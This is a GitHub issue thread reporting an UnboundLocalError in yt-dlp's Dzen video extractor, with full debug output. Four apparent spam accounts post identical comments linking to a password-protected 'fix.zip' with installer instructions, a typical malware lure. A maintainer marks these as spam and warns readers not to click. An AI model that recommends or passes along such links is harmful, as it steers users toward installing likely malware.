### ISSUE TITLE
dzen video ERROR: local variable 'fmts' referenced before assignment

### ISSUE THREAD

**Issue by gayratv** [yt-dlp/yt-dlp#10852] opened 2024-08-26 05:20 UTC
### DO NOT REMOVE OR SKIP THE ISSUE TEMPLATE

- [X] I understand that I will be **blocked** if I *intentionally* remove or skip any mandatory\* field

### Checklist

- [X] I'm reporting that yt-dlp is broken on a **supported** site
- [X] I've verified that I have **updated yt-dlp to nightly or master** ([update instructions](https://github.com/yt-dlp/yt-dlp#update-channels))
- [X] I've checked that all provided URLs are playable in a browser with the same IP and same login details
- [X] I've checked that all URLs and arguments with special characters are [properly quoted or escaped](https://github.com/yt-dlp/yt-dlp/wiki/FAQ#video-url-contains-an-ampersand--and-im-getting-some-strange-output-1-2839-or-v-is-not-recognized-as-an-internal-or-external-command)
- [X] I've searched [known issues](https://github.com/yt-dlp/yt-dlp/issues/3766) and the [bugtracker](https://github.com/yt-dlp/yt-dlp/issues?q=) for similar issues **including closed ones**. DO NOT post duplicates
- [X] I've read the [guidelines for opening an issue](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#opening-an-issue)
- [X] I've read about [sharing account credentials](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#are-you-willing-to-share-account-details-if-needed) and I'm willing to share it if required

### Region

Russia

### Provide a description that is worded well enough to be understood

Video URL:
https://dzen.ru/video/watch/662c977fdc525b089c5f7a03

over video from dzen.ru downloaded without problem

### Provide verbose output that clearly demonstrates the problem

- [X] Run **your** yt-dlp command with **-vU** flag added (`yt-dlp -vU <your command line>`)
- [ ] If using API, add `'verbose': True` to `YoutubeDL` params instead
- [X] Copy the WHOLE output (starting with `[debug] Command-line config`) and insert it below

### Complete Verbose Output

```shell
D:\youtubes-store\dzen>yt-dlp -vU https://dzen.ru/video/watch/662c977fdc525b089c5f7a03
[debug] Command-line config: ['-vU', 'https://dzen.ru/video/watch/662c977fdc525b089c5f7a03']
[debug] Encodings: locale cp1251, fs utf-8, pref cp1251, out utf-8, error utf-8, screen utf-8
[debug] yt-dlp version master@2024.08.21.071743 from yt-dlp/yt-dlp-master-builds [6f9e65374] (win_exe)
[debug] Python 3.8.10 (CPython AMD64 64bit) - Windows-10-10.0.22631-SP0 (OpenSSL 1.1.1k  25 Mar 2021)
[debug] exe versions: ffmpeg N-116468-g0e09f6d690-20240730 (setts), ffprobe N-116468-g0e09f6d690-20240730
[debug] Optional libraries: Cryptodome-3.20.0, brotli-1.1.0, certifi-2024.07.04, curl_cffi-0.5.10, mutagen-1.47.0, requests-2.32.3, sqlite3-3.35.5, urllib3-2.2.2, websockets-13.0
[debug] Proxy map: {}
[debug] Request Handlers: urllib, requests, websockets, curl_cffi
[debug] Loaded 1830 extractors
[debug] Fetching release info: https://api.github.com/repos/yt-dlp/yt-dlp-master-builds/releases/latest
Latest version: master@2024.08.21.071743 from yt-dlp/yt-dlp-master-builds
yt-dlp is up to date (master@2024.08.21.071743 from yt-dlp/yt-dlp-master-builds)
[ZenYandex] Extracting URL: https://dzen.ru/video/watch/662c977fdc525b089c5f7a03
[ZenYandex] 662c977fdc525b089c5f7a03: Downloading webpage
[ZenYandex] 662c977fdc525b089c5f7a03: Redirecting
ERROR: local variable 'fmts' referenced before assignment
Traceback (most recent call last):
  File "yt_dlp\YoutubeDL.py", line 1626, in wrapper
  File "yt_dlp\YoutubeDL.py", line 1761, in __extract_info
  File "yt_dlp\extractor\common.py", line 740, in extract
  File "yt_dlp\extractor\yandexvideo.py", line 276, in _real_extract
UnboundLocalError: local variable 'fmts' referenced before assignment
```

**Comment by WSA1k** [comment] 2024-08-26 05:20
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment] 2024-08-26 05:20
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment] 2024-08-26 05:20
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment] 2024-08-26 05:21
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bashonly** [comment] 2024-08-26 05:36
Duplicate of #10818

Please ignore the spam comments and do not click on their links

**Closed by bashonly** 2024-08-26 05:36 UTC
Labels: site-bug, triage
